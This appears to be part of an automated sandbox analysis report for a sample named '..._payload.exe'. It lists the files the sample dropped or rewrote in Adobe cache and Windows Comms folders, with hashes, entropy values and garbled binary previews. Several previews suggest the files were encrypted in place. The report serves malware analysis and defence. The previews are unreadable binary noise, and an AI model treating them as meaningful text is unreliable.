                                                                                                                          Preview:2023/........iJM+DL......'C1>..Rr...:[..a..!.._.../.3C.`...5...4...+.,....>...\.V........5..Q.3d....Y?....=...N..3z.*e&...._"...7.q...C[.]~....^.(..Jtv...*........m..d...q.....B..0D_..0.....5z.b...J.9.kz\.\am92).>...Z..F..#.w.=i.......~..\...3!F.E.2~.I.}+.*#."r.\.../b...x...%{>y..}.R.T?...?. LcV..K....vx.sF.b1.A>]......[..BjG....w.K:....n.{.9...F..y.b..#.p..pB*.....Zz..?$6...=.....2F?..7.O.`]...bfpz.|..Y...q ..d.Rq.Wo.. ..{... `=.)....E.2.Zf._.V1...........Z..}>.NL....C...Zg.X.uGsJ.....5j.m.".Z...].,.....I.o._:.c....P.m....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG.old.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):635
                                                                                                                          Entropy (8bit):7.637877464077059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:k1AVBV0coCXdckAkrrYvzbubIlx0hW7qjcO4HL+Ca5w3nLq5bTcii9a:W4BVXf+t3ubqxEWuDw+Cau+bD
                                                                                                                          MD5:E223DD9A2AAF5069F05F1C90CEDF2F64
                                                                                                                          SHA1:AA66840B9C9B3292FFEA136C9063D350036CF302
                                                                                                                          SHA-256:55685FB3423C19BC9936350C5B99BFFD428E929CD39815AB20FB8FF1145B1AB3
                                                                                                                          SHA-512:E4E344F57BBDBA018FE00000FDA7E77241CEC7CA6B3E65EAA6453B57761381A188ED700D02241364C08871BF07B3254A609133856DE8DB2D3D78769C1A3A34F0
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/........iJM+DL......'C1>..Rr...:[..a..!.._.../.3C.`...5...4...+.,....>...\.V........5..Q.3d....Y?....=...N..3z.*e&...._"...7.q...C[.]~....^.(..Jtv...*........m..d...q.....B..0D_..0.....5z.b...J.9.kz\.\am92).>...Z..F..#.w.=i.......~..\...3!F.E.2~.I.}+.*#."r.\.../b...x...%{>y..}.R.T?...?. LcV..K....vx.sF.b1.A>]......[..BjG....w.K:....n.{.9...F..y.b..#.p..pB*.....Zz..?$6...=.....2F?..7.O.`]...bfpz.|..Y...q ..d.Rq.Wo.. ..{... `=.)....E.2.Zf._.V1...........Z..}>.NL....C...Zg.X.uGsJ.....5j.m.".Z...].,.....I.o._:.c....P.m....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):617
                                                                                                                          Entropy (8bit):7.640195979500399
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:kVjX8oFWbKTbRyJnLiB0bCGxlmF/q2GYZmUQfVUDVWJzpeDJnLq5bTcii9a:278RiylZbCGMq2GYZmUQfVOVWZ8J+bD
                                                                                                                          MD5:DE922DA0BDDA5181EAB3A2581EB28F54
                                                                                                                          SHA1:6C15815B2CA32616DECC3E16672AABEE453094C4
                                                                                                                          SHA-256:BBEBC67D581DE259569370B6C1A483CECE31626C38B62627E000BC563C75DB0A
                                                                                                                          SHA-512:F78CB1C638C21643586673EAAD56F6AA961541A793F08F4AB1E5AEAB3DAB7EA09F3AA16C280C903066BD87B278FD9B0D42C863281D9ACDFF95595217E174E820
                                                                                                                          Malicious:false
                                                                                                                          Preview:2023/A.k.yI(0=......A.....t.T.v......W3~Pg^\1,n.;"-..5L.#.W..O]-n..'......tpM~.....d.w[wd...K....M..$#V-./..l.Ez....J........O.....Y).~.*.LRlQ/....,......6.lGmo.:}$}..o....wc.F,e..nt....|......(@.'..g...cKJ.m.._...J....O..N..,J .-.........m."YO...........[...|,...|G1...*..`.IV...$.~.V.z-.b.v..%..a.P.6.*....z.q.0.A..`...%..i.. .[..P......$q.k..{.@.S..=%.>.+.q4.KdBN./.U....HR..;...T}B..uVhk...!.....V..5KE>...D..C..)?9.....+PzkV../......(.5s.F.'.G...'..#.......keg)..K^.;p...l_V.E..&...........},...77|Y.-..V..!.f}"...j%>"..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):818
                                                                                                                          Entropy (8bit):7.742865852813557
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YKWJsv+8AiIdCPai5+6tsUBImBLQXyP+abD:YkW7U/ntsUBIYLjWYD
                                                                                                                          MD5:1AF9D7DBFB2C88EA6CE55566B4426927
                                                                                                                          SHA1:B3F50D0B8C376D016D0A13E94397037E76CD2164
                                                                                                                          SHA-256:B1C25BD8DDE34C59D560E6431298B1CA088541C44A280BA23260041EEBA166D0
                                                                                                                          SHA-512:33E223C5CC8B3E20B044FAB7044129F1B6EF560FA428EDE988972A774EC6006DFDC5354F306478BEC3348DF212237457982CAC73F35A288400A3492799B1F20E
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"os_.......w..d.......OvI.M.... ..e.[!7....,....Et,.C.4-P.j.I..R.O....y.K.c.uV....e=7S..!....~......{.........A@.h3..M...o...w.`.c.VGd...eE..@...>.o.......k....m.. xC.B..1.6>.W.iG.........9w1-T^...n.&.+.;4........7.R._'..[.<.X%#.I.j=.y....p.....Qw..V..J..z&Xh.e..\..i.....ar...53s.%g..[...<Y.K...aH:.A.*+1..JuX.XN..P8.9.Ae.Y...9k....7...sH.j.f..,..H.T.Y.(..#...p.hS.U......s...(.W...=,.....8....(...d4>...... ..O..V..4R.y.s.+..V..<z...)..,.'..............!......L^.$..8.U.oo.GD......s.,.6......y.E;BE...{......csf.l.7./k....E.M..0fOd..J.<e.8.{..wypPB... ...7c......>...>.....-...R.[<5..W."..{....m........G.c..K2.7.,.`e.?.b.D.g..J..e.`p.....P.P!P...Ta.b .A@MX8....m{..k...n.0.....6....%.2<<.)BZ..|.T2/.....phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:PostScript document text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1567
                                                                                                                          Entropy (8bit):7.882415954422506
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:g0ctQ0sg8Hvc2xipKoeNyZG3+Q9Qbkwb9EVTwGSkd7bybLnEBFWmGbD:wQ0GPc2opKoeNyBQubuVpJCbLnE8D
                                                                                                                          MD5:FDAAF1518D3AA71B1D6F73168998101D
                                                                                                                          SHA1:BD941EFDB318225FC8C0EBCF642C935D5F56EE79
                                                                                                                          SHA-256:A1AA7D85A946B4F804713CAD42704070E7B2C7691FEC4EBD7C946F0DAD968554
                                                                                                                          SHA-512:80FABC2A7C771682B141EF4DC4744537066DB0588D92A517BA358FEDC0F133E0489054EC69A0817C048B9FF38EFDE4042614818C3D1FE248CC5033B03F27EB0F
                                                                                                                          Malicious:false
                                                                                                                          Preview:%!Ado.jx>N..K.E.!.v)s8E...q^.O.U.g.,.#..W..K]qY?..._4..X.7L..za..=.=\.s....7..i..`..){.jy.t..Y.p..>.O%.....Np.Y..c.......f...[/3..F.-......g5.....$.`.G..Q.....zx.y...`U.....G..V./...K.>..D..pZ.*FV.A.+.3...k....'7.t.......\......D{..!......m...1t...~9...9...a\..+..z......bM.F#.j.U...90...;)..q.:.k.q.~A.......n?...c'....M..;.5.U`w...............TV.i.Wu..3....,.$..Y....s.)..[..\yvB2q..,......}..M..{t.?7..=<.).8E.l.;...K.ma#...}..a..c..k.x.#...A6_.7.V....7..Dd......".94.....=m~6.0l(u$K2J...w..f...8..9......c_H...... .K\. |q......$......z......a..N...5.y...p..f=.~jL(mU.P.g.......>V.r-uT......<....N9..S..$..S;GI@....q..C..SB..3......%.B./..c.sK"..C.!W.TV.w.t.b... .e.t<.... 6..n.C.k.L..UI...Fr..c.8.K.G..!}.|.......s._p.%HR.&...#e).H."x......G...[.ik(.T!H...o.. .B^E.3.]...L....#X%.N....?.....U.4...l#.X.B#....J.o.}.u.j.n..IkJf.R.^.r..........\v/..........r#..a.L..nL.u..... ...QN.H.v".@..H..~.H..~>.Pi...Fq...gR.+.1...92.N......@.rF.g=xt..$.

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:PostScript document text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):185433
                                                                                                                          Entropy (8bit):7.875001141120135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:dNkYzTu0uN01/yGnMmM5tM+5LD2XaUGoHH79fWAh006Dknf4kE0u7xP9XE07ZmaD:dNkYzB4GyXmM5tM+5fCF4AhSkADXE07r
                                                                                                                          MD5:88656099288F098AC43FFD49BDF36F74
                                                                                                                          SHA1:1B4F55C42C1C5C56198CD112E64E5A942A2FE265
                                                                                                                          SHA-256:A8D35036F734899F9E8D2C41DC0D5E444DE15AA19977AEB809CAA37361F1EA4E
                                                                                                                          SHA-512:65EB169E94D5B6CFAB04EF1B3ABA861EF2CA594E41E7DFFA68E836AF804B45AB35BACC5A8E9726F6ECA318EB70E3EF022C6A53F779478114EDA7E3C0807819B1
                                                                                                                          Malicious:false
                                                                                                                          Preview:%!AdoL.....v....zu..d.'.pg..@f...a]d[..I!.z2M.>H.m.B...c...zxTl.F.........4....)z....%..h..o...e.Co~..:.q..bP.\..:.P..Y..C.t...JbdU2.....S..l...N.@.r....s....v..[.....&8..q@.z.(...H..aU.M{....V.ADp.y2.D.....Km..hE.<)E._...d..@B.t.J.%-N..._.!j.....D.#..n.z.........^..G...........5..$w..i. ...pS...... .....`.e.#y.Ik.p)..[{.l.....{],.8..v...M...T..p..M'.\.......n.-..[R.6...._..-...QT....N5r0......%...k....)-..^.y.{.4.{..Am....I.cK.^(..l.T2.x..S....#E*$..9.0.p.g...w.'.3......a.{ U...|uv.G..u..#..m.Ad...t..JM.[.<.^4....<qU..#....7.P.....9........K.S.Ag..,...t...n>...0...t..YI..?.3i..^C..O....@.........c...q..`...Tb.:+>.'..O..u.K.<.}XI...C.Eklu...9.-;...TO..h.!.fR....%ZLW...z\.2.1D.....0....0h*Z._:.....K..`.9...,.....s....AT..{.......:..........0mQn.kpK.b.:.'..XUG..P......Q...._..(.....*..YN..W...D.....Z..t[w5....QH.I.JG9P0] ..o....U.FEZ-JGV..bl...4..3.u.4v.0...Q...............T..pM)......Vg>.....~...(........5Q"..RZ.X.z...n..S. .2....."8-q.*..Q.K.Y(.L....b.

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):243530
                                                                                                                          Entropy (8bit):6.819757808718196
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:wvwld+ZQQNd6YmgA6nhjJ2obHn9coAKo9RJe2D6GyqlkGQWBXE5pOolNlnc:FfAQQyYzHX/JAtRk2D6gl/Q9Znc
                                                                                                                          MD5:04AC29C291FD2ACC0601D7D6D623F775
                                                                                                                          SHA1:D6B0FAB0C1479E0A80EDA3343E1EF9D2A1CE99E6
                                                                                                                          SHA-256:AC458EFEB291900FA071C1731AF4B892BC6523F8C383F87D8ED5A46623F3E15B
                                                                                                                          SHA-512:7C3C0EDA87650D9F00F52BA9F797B0299A4D7486A6A91BA85718318D073945E0CE9904994D6B7802B62FF38FB5EC16052ADEF78DB77AF27C514081B240C289AE
                                                                                                                          Malicious:false
                                                                                                                          Preview:Adobe..Cve.g..q<H6F.......r.Y....vd..OU.yD.."........-..Y.3gM..X...n....!....96....N...h=.2z5..5..p?.G..!0.Ng... ]..~(.f.C.V.qf.8...2*.....w|.G..yX..........7.|...)....?....[.....|_..X...m..(.x...H...7.DUH.D~..<..a(.....1Y..@....h.g..~+...`..-.m........g.3.(.3.".;vRU...BnA.l...`.......5..qG7..@E........Y.\...?{.i..........6..ai...m..}...f.2..H>K..i....d.ac..P.....+..4*...#N.(.k!`...3.06.CQlTv..N.HY....2.,U.3...h4.x-5.....8..../)...c..D+!z'o............}........9..#.....\....=..s....E.:....N........4..*.w$..f.}.J.~g8..q..z.L.:...1.c...d.n`......bx.....U....e.%....V.....lC..V;....8..Glg.%......7..]..../IS..W}.._V..u7Y&.zLt........q....m"..U.tK2.........?.....1/...XB,....W....!.V.2*...W}.....w..p....%.;a./TT..Z:qOO.,.....<}.}.C..;....J....aQ..~..S..G.Ik..}%.k.<....>..Vw.3[..f.]f.O..b..E..@kV"...a...LyY...?.cJ5....7.^...A........5...,.....!.........._&..&...Z.......im..d...O....e.Dq.;....#.>ZS..Q....\...E.w....B.P.O..d.,....es...5.

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3152
                                                                                                                          Entropy (8bit):7.935512748101612
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:27fqtKcIFEvikWSwkMkK5vaT6LEqO8ivdwJf5E:afqccIOvikK7kAaOS8iVw/E
                                                                                                                          MD5:3C0FAEF019698D2FDCB861BA07151DF0
                                                                                                                          SHA1:0320D6703E59B270F70B5D3E6BBB6D21869F53C4
                                                                                                                          SHA-256:16339F74FB9AD0653D73525D8EC3AD69BAE602897CAD62657645C9C825C607BF
                                                                                                                          SHA-512:2C8661745E5CE379F82E8C3FDE505310B2481FE0B198337181775005C96972D77EE89DAC2D03E05C5C4A4F62604C776DF4873D64799AA5302D66C9A8B86FF677
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"all..3.%.$.hf.......)......1..@...y@!..N).(1{.5.....N........J...Kl.;`...n.......Ly9.........8...N...PnM.V%..<.<..O*...&".(qn.O|.....CS.Q....,.m......C.....g7xv.S]c....A.X8.%..W../....~.Y..q@HK.uJ.\.*...UB..Qs....$...,....*.H.8..o.6.W..o.pL..\f....g.......P.w2..X..e[[..u..rU.l....j...@......j...r....?..P.H...(.h..1.T_IV.N.v.U..$..v.........n/g..:.` ...........3S..p..tER..nT.%..HQv.Ze.Dj*.$.'u'y..HA*$..f.........v...C.z..\V.....8...TCx.V6^.......v(.d}..b..L.Y.>p!9...@.2.....L..A....[..*...kXS)..W...>G...Gv..s....+......J.m.........q'I.z...U&.2.x...Lb...-...]...-.n.]4.$._S........,...T..|n...._.1....n.%...7&.:l.,~sZ3.(.s..>......!....N.g.t.H.[..0s...`...1........1..w.P.t....o'....M../.e..Paw....6Id.{U}..lA5......Q....DP|...^......N.P...O~...8...sa..e."...^........w..P...]^...3.;..J.Qt...H0|...<..j"s..rDi...2....65.Y.].4Ap....bnG2?_j(9.+a8.BZ+$.v.A.Zw{Hx..l.qk\e...3o.U..J@..!u[..@...6.+6...TUQ.-q.5HY........l..W.....&|+...

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):67060
                                                                                                                          Entropy (8bit):7.997343046079011
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:L//Mn0WPGoRfMd5IUCgbD8j1bNDorji6rIN6gU6lFjln6:L/E0sGopM3IBgb4jvF6gU6lS
                                                                                                                          MD5:F91677AC5C6F468E443856B0B497AE93
                                                                                                                          SHA1:AF6B0402C75005584AD76BDF41A1E499E00B75DB
                                                                                                                          SHA-256:D83471DC98F60806598BE306D55A144BA9BF7BF519219745AF7931AF59BF148D
                                                                                                                          SHA-512:909FD5BD61CAC9662834B07F6186D8AF7610A84D39253125BADE039E6D8B122693E8F0C2AF664C0CD113D94335CA43C7C0F7132E882A968AF5C9AF27D19D5A15
                                                                                                                          Malicious:true
                                                                                                                          Preview:4.397P}Uf].A...G.s.p_.-.., uxa.'.2Z!...M....?.*.......J.....]f...2H. ....1q...`.....X.%.J..x....I.m.KKc.v;.~E">..%L.....tz....;.....m..'y....C....6.Ylq..$.#.L(..^...~5...W....4?.5d......zWBU..(....qD.g.5.4.U.P..q......f.1.A..._...5.....U&X%...b........_1..._..2.......C.c.8.J...W.......c....E.A.,..F..-m...Mtoc.O.4.;W.i...[...3.K.....Vm\~...........m...D>.....p.{..o..)...#. .7.N...;...EQ.|0.rFG..i.n.H6.}.i.....7.F..Y%E../......\3..H.ag.%c.G..6.....$_.~@4a..eV...kg.?.....&JW0.'m.......a...R......fK^`.h.E.:U....2zy.a.E]9...d.5Nn.....f?>J....Gy.36I.....H..Z7..mh......MX.o...f..\IF-\.(.Z.W.6......$#.j1.`.<..Z.&.y.=y...>Zv..+...'...A..rO..8.3..|...UMWiG=`..P.P.X"/.....f[ ..1.iT.}...."...C......8..?...x...g.&4.~.r..5).fY}(.U.H......RA.V}M.v.7....7.+.%.K.$a.BA....>p..1.j...8-.v..'....pC3.L......"|Z.W....!V.-.....|b.~.D<4.....g..L.w..BP.[^Z..a....=.TY.73.............[..w..,...Qv.O..%......./.....}F.p.&q..s..[.AmU....\D...p2..[.y.=...J.T"..,\.tl ..K

                                                                                                                          C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):932
                                                                                                                          Entropy (8bit):7.74942043671174
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:W3QKIiGZECz6u8tRaqzAdrOtsTrbresfNbD:WArvZfh856OtG3rnVD
                                                                                                                          MD5:9386A03FC52688573F86F77A54AC6440
                                                                                                                          SHA1:623EE31DA244BBD9822ED66AFE5F60EC637FE881
                                                                                                                          SHA-256:B69C7F373D3DC4671D9D10DE85877AE49758906EA212443001CCA7DD0B510ECD
                                                                                                                          SHA-512:1CAA4AEBA203B903B330806CB1597AC82D1ACC930C0994FE5F360446F921C98712468172AEC890D0FB13A73520C3995C9137DC7F11B789AEA090338B912678F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:CPSA..O.8.Q:t..8Eq3ue .q.eZ.......5.bi.....w...\.7U).........Z..`.......Y..\.....8...o..L.4K......TO.%.P.......a.O/.Ei.S.Z.!.s=.3x.\....P.k_.&.~.O.4..9Yk.sL..(...B...&F,.9...s ...h./....!}.~.e<.z....^.._.5.. .#.T.........X..h...?~..M.".R.XD.q.gW.jX.......?]......mE..P.:.").!x......h-....!.#`.......(f...;.l.I.......\q.....K..../..e..\.>R.d.!~...k......U.W..-.8 .^....#..[...kj.......C.v1.......'M&.%..".ss.6j........).k..h)...tR....9.......)c...5.m..7YC.Lw...-..s.h.....I.Z... =...-..g..0g.0k.../.M=XL....f_.t.K+l..Z"...E..f.b"Qrgfo4SoC..r.|.:.. JK...D..4."..7G.%.d...pZ./.N_..............)BO2M...wDp.-.`u{...a.|......&3...DF....o..qHN.......'..K..].ue.m...#;.....xfV..K.m..7sU.`.=..K...w.\....[#'...b.Q..P......T.x..X;kC...a.z.U...Ip.._..d..-|..\...\..P....U?.........z....E...M.t.`.B.@..E.`.5X<R..!.L..\JphJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8526
                                                                                                                          Entropy (8bit):7.9748669307175035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:esGzoGTddQHTn0DwLMGFwPJTx0kL/GwfNx+LZMyudc5nXnu:eDf2He+a0Xw1x++m+
                                                                                                                          MD5:841B9D6FA4785D63054E224ED54D4782
                                                                                                                          SHA1:51D7610803F72288667415A784A52BFC31C86DF9
                                                                                                                          SHA-256:2D9C36BA7DD66424EA150A7A35E185C77F4ECB55DFC323B300A2034433E2BAB2
                                                                                                                          SHA-512:94AF90DEDFE2D8BA5DA45F8D5AA5D04218CD7CEAB5550FB5F28445400D3B0CE99CF3537DF3F3E154ACE231443E940B43F14D95A56182DD426B6B3BE21C57C4EE
                                                                                                                          Malicious:false
                                                                                                                          Preview:.M.#.Z~7.d..M".......F..>.6....@..2.$........Rj.....$.Q..o..m.Z._.....e..~R.i;.[..9.6[.r.b.LS`...4.r.^...k_.....`~....*..%..yo.2.#c....d.^A...0C.b.....R...:...a...q...]...S.v..B(".....P..T^.H..o3...h.f.z....BK|..2..c...g.z'uMB~b.i...I.k....8....w.......H.2H!.5z..zw.k,v.sK.....p\.....`f.y.$......x.........;^..|..puIm.@L.(.?.t?.68.E..&.....RK#.@.u......).?.....a...5....>..>.|U...H3,s.c.>....d..!.)...tn....2/.&..|X.^.0-v9.[o.q^$..\~.0.....5.4...GOE+u.#....".x.k..0&dN.i.p...`evsK....U..yV.N.Il.n...h.Z....+.P..).}.I..+s.......a.a(Y........._......V.<.........d5.E.@.N...\.Z....v.E...8...s.1<2...<.Q..S..;..>A..M..B...5|..`..W..,^1..J.4.z.`3....c...Q. ..6.........A.)..j]............A.R..[....~<....Z:..{...3'.=3.S.r...<K*.2............3....S....-..ih....x...w-?'hz.yE.....vT<Q8}......7.?y...M.J....x...|..#P..............;...L.<....t}y..;.K.dc..m.Q..h-Y..[0...mb....E.?..e..a..0...a...t..F..:RP.k....0.E.......Z.]/.....z.rzF..Jb....pUcvi/...0..

                                                                                                                          C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):1.7334640075714887
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:jnRo1neY/sOdCJT2nVOiGqta7U9qo3agO/qqv4RROYdVbtzFnrG5J5qh+AJ3TGXz:dohjHJVOhqta7UwfCdYS4
                                                                                                                          MD5:39EC1824298E36967CA827588F314790
                                                                                                                          SHA1:C059F3A28887669C7E2C0EA20F2C56F655D407F0
                                                                                                                          SHA-256:4A1977ACCF409CAF56A7E1F268221D5B8FD43EF41904C6A12396BA2FAA4FCDFB
                                                                                                                          SHA-512:AB2CBDBD19CAF12CE8F2CBB2BE04DD9491FFD036F1BB134062826032CE02EB31411AAFA9DCC373CA1C9F5C29254494C1153992990DD5A4289582353735D62E42
                                                                                                                          Malicious:false
                                                                                                                          Preview:...?...1.X.MX."t.}.GgxO.S....*.^..m.G..............Aa.e.t....V.k9....gcQ............%....#z7M...,..]d8.'VM.3~..U......W.w.....tw.|p\292.R...I.tt4.....&.._D.]..K.o...D..QB3F#..=..Tb.w.5.0..^..0.....E....U.}.H..x...s.........^=..7:.l.[19.#.ps.<..+i`.LD.94:.q..........db.y..?.N..G{..p.&@.V..`@Pf..5.B.av.....X..o..`......X........g.j<......O.m..\S.i...'k...gk...qe..7]L}6..d...J...u..%.L...F...{....U...&.......l....., ....-h.+t.J....o... ..{....D.-..L..T..'.[5*.W.4IC.jB.~....(.R...~.,........ZC.......MC5..d...`....T_......~....k....T>..}...Q.d..b!f}@4..<Z....W.+.......tC7.....c[Fr\1o...nA.1...c..Y..o....,.].t.+fA|.c.H3a..>q....."2Z.0....=(...`.....R...?.tf.z`..X}....U..C....#.e.<..C.K,w.!<.......m.B...2..L...@0..;'m..<E.;....Z.|..)...$...h4...........2.=...3 J$.\.T....+...)l.F.3..9..........?.^,...`."...I,AyA...X{.}.....~IC...=....iZ..*...F...-b..^.L....qf..5...v.... se..6...r../.GKV...O.tx..B.........~....P.%z...,.Ah.1..B.'.N.h...

                                                                                                                          C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):0.6707795981922549
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:XnMgLeeiTh4F/K2lWlZT5ATPXuwmzp/Dk6qZXmRa+A/8aYa9gX4z:XnM2eeIhoyFlKPeRbk5xp+Aqaag
                                                                                                                          MD5:DF8BE8C21ED0310E64D1F83B326E04FC
                                                                                                                          SHA1:20351396134B31CA27F05550CB10EED115065ADE
                                                                                                                          SHA-256:E71172FCA643520744643C985C6B0B29975DB1EF9AFA0A32CFFA847A16BBF40C
                                                                                                                          SHA-512:62AA972E54AFD15D13FCC54C843EF1165CE5D9AC9784D08FD4FD37C8746216F2CFA7BF0BB6B07B8FEE68AFAB37A132DF8AA548347400DCE480F06CAEE5086EE9
                                                                                                                          Malicious:false
                                                                                                                          Preview:.....G=.$.../.......i..3...t.5..Z.-*..COa.`".Lt.._v..q.b. .Tn...60..V..ptQ....JXJ..............mh.*.j.....8...m....;Qy..[Mv.a(,"./dQ.=l..G........}..M.;.sP\/v....W.......X..=&..(7...^.W.Qm.h..Yf\N..>....A4u"....C..J.6P..3.,..FdSv=.......c&... hvD@....0..Q.x...[........i.6.c,.S-W...r..oFM.)MU=9.R.b})m..Bj>:.!.c4b.....DI...z....=.....(4.....Z.:."[.J...g.e.AC..iO...W|GY&..M.V.ys\....4y..f?.i....r..:.mD9s-..{.R...].v..m;..w....7g.#.......j..a8.k&...E.=..J.(S.:..u.C.W].M.&._.g.....D4...-..H&...c..B..R.0.i...O...@*u`.6.N.Z.l..GI...Q.c8@. ......R...N...b...?.#..8..>.W....NzZG.r.....tQb...........}.m..'.B.I4..C......=M..B. 5..9..YI=.}D......H.....`...0... O....3.k....c.Xl..}.2.~..^w0...?4..]7...hv.....b......+..(...'..Z..a}...oN. ^1..RU:K...1ka".B...A.pC.&....X.Cc..e.|../*-%.acNg..8.q.-p..7.J[.R..vB....0H...]...]Z.2..S%.\FL..{r*....2.c.SQLq...:\....2|t+S.sl@[..h#...KYlD...(ol<.4g.........g!-..CV.!.:.....6..5.-..R.%... W....Z.-..6.g.2r_A1..Z.W5S.M...n....B

                                                                                                                          C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3146062
                                                                                                                          Entropy (8bit):0.6705422699318089
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:OQ1cgJVuIbc46QjsRDhUIwmiYPXBzKWZFmgUzghhayXw:OhEc8jaDKIP3PXBUJPf
                                                                                                                          MD5:C6A111979AB44270580695CE4FDA7BB0
                                                                                                                          SHA1:5BDAA1A0508EDD3E8DD7FDEC7428B2109F38C029
                                                                                                                          SHA-256:48A114045D9F58124ADBE33811AA5AA9E18BE4D1E02015D8C66D9DB1B893A8AA
                                                                                                                          SHA-512:AF0479AB6586527461B5C5D30E2572C724537E76C3B156D6C3BA15CD6CF8353DE7F1C7C1F2EE7156B503A79D36FB46C6D52B72972FF6B88161D8E6A9E00C36B8
                                                                                                                          Malicious:false
